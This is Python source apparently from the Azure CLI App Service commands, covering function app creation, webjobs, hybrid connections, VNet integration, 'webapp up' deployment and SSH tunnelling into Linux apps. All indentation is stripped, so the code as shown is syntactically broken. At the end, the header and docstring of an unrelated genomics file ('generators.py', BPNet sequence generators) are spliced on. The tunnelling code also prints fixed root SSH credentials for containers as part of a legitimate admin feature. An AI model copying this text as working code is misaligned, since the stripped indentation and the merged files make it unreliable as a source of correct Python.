site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_linux_fx_functionapp(is_consumption, runtime, runtime_version):
if runtime_version is None:
runtime_version = RUNTIME_TO_DEFAULT_VERSION[runtime]
if is_consumption:
return '{}|{}'.format(runtime.upper(), runtime_version)
# App service or Elastic Premium
return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime][runtime_version])
def _get_website_node_version_functionapp(runtime, runtime_version):
if runtime is None or runtime != 'node':
return NODE_VERSION_DEFAULT_FUNCTIONAPP
if runtime_version is not None:
return '~{}'.format(runtime_version)
return NODE_VERSION_DEFAULT_FUNCTIONAPP
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False):
import os
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir)
lang_details = get_lang_from_content(src_dir)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
|
generators.py
|
"""
This module contains classes for all the sequence data generators
Classes
MSequenceGenerator - The main base class for all generators.
Multi task batch data generation for training deep neural networks
on high-throughput sequencing data of various geonmics assays
MBPNetSequenceGenerator - Derives from MSequenceGenerator.
Multi task batch data generation for training BPNet on
high-throughput sequencing data of various geonmics assays
IGNORE_FOR_SPHINX_DOCS:
License
MIT License
Copyright (c) 2020 Kundaje Lab
Permission is hereby granted, free of charge, to any person
